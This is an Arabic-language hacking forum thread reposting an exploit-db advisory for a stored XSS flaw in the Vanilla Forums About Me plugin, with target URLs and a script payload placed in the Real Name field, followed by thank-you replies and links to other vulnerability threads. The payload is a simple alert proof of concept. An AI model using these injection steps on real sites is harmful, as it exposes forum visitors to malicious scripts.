ثغره جديده { Vanilla Forums About Me Plugin Persistant XSS }

ثغره جديده { Vanilla Forums About Me Plugin Persistant XSS }


النتائج 1 إلى 5 من 5

الموضوع: ثغره جديده { Vanilla Forums About Me Plugin Persistant XSS }

  1. #1

    Gadid ثغره جديده { Vanilla Forums About Me Plugin Persistant XSS }

    بسم الله الرحمن الرحيم

    كود PHP:
     # Title: Vanilla About Me Plugin Persistant XSS Vulnerability
    # Date: 18/5/12
    # Author: Henry Hoggard
    # Author URL: henryhoggard.co.uk
    # Author Twitter: @henryhoggard
    # Software: Vanilla Version 2.0.18.4 + About Me 1.1.1
    # http://vanillaforums.org/addon/aboutme-plugin
    # http://http://vanillaforums.org
    #############################################################
     
    Go to http://target.tld/index.php?p=/profile/editme/4/testmember
     
    Post your XSS In any of the text fields, for this we used the Real Name Field and the following XSS
     
    XSS
    :
    **********
    alert('x')</script>
     
    Then if a user visits your about me page (http://target.tld/index.php?p=/profile/aboutme/4/testmember) the script will execute
     
    #############################################################
     
    http://henryhoggard.co.uk 

    رابط الثغره : http://www.exploit-db.com/exploits/18911




    تحيآتي

  2. #2

    افتراضي رد: ثغره جديده { Vanilla Forums About Me Plugin Persistant XSS }

    مشكور و الله يعطك العافية

  3. #3
    :: مشرف قسم الباك تراك :: الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: ثغره جديده { Vanilla Forums About Me Plugin Persistant XSS }

    شكرا بس مواضيعك عن الثغرات كتيرة الواحد مش عارف ياخد اية ولا اية :- ههههههههههههه

    بالتوفيق عزيزى ... ونتظر جديدك...!!


    youtube

    [ما يلفظ من قول الا لديه رقيب عتيد]
    [ آفعل مآ شئت فكمآ تديُن تدآن ]

    hacker ▎security ▎no Breach>>
    [ mohamed -kareb ]


  4. #4

    افتراضي رد: ثغره جديده { Vanilla Forums About Me Plugin Persistant XSS }

    مشكور و الله يعطك العافية
    ربي يعافيكـ و يقويكـ

  5. #5

    افتراضي رد: ثغره جديده { Vanilla Forums About Me Plugin Persistant XSS }

    شكرا بس مواضيعك عن الثغرات كتيرة الواحد مش عارف ياخد اية ولا اية :- ههههههههههههه

    بالتوفيق عزيزى ... ونتظر جديدك...!!
    أهلاً بكـ يآ رب رحمتكـ

    اشكركـ يا اخي العزيز على مروركـ
    وأوعدكـ بجديد { إن شاء الله }
    تحياتي

المواضيع المتشابهه

  1. ثغره جديده { Sockso <=1.51 Persistent XSS }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 05-24-2012, 09:30 AM
  2. ثغره جديده { FreeNAC version 3.02 SQL Injection and XSS Vulnerabilties }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 05-20-2012, 02:45 AM
  3. ثغره جديده..مش عارف إزاى أوصلها..
    بواسطة black_dream في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 3
    آخر مشاركة: 05-14-2012, 05:50 PM
  4. ثغره جديده اسمها vbulletin_md5
    بواسطة kapos في المنتدى قسم الثغرات
    مشاركات: 15
    آخر مشاركة: 01-11-2012, 11:15 AM
  5. ثغره جديده بالتنسيق الشعري
    بواسطة وحـThuGـش في المنتدى منتدى حماية المواقع والمنتديات
    مشاركات: 4
    آخر مشاركة: 11-27-2011, 04:01 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •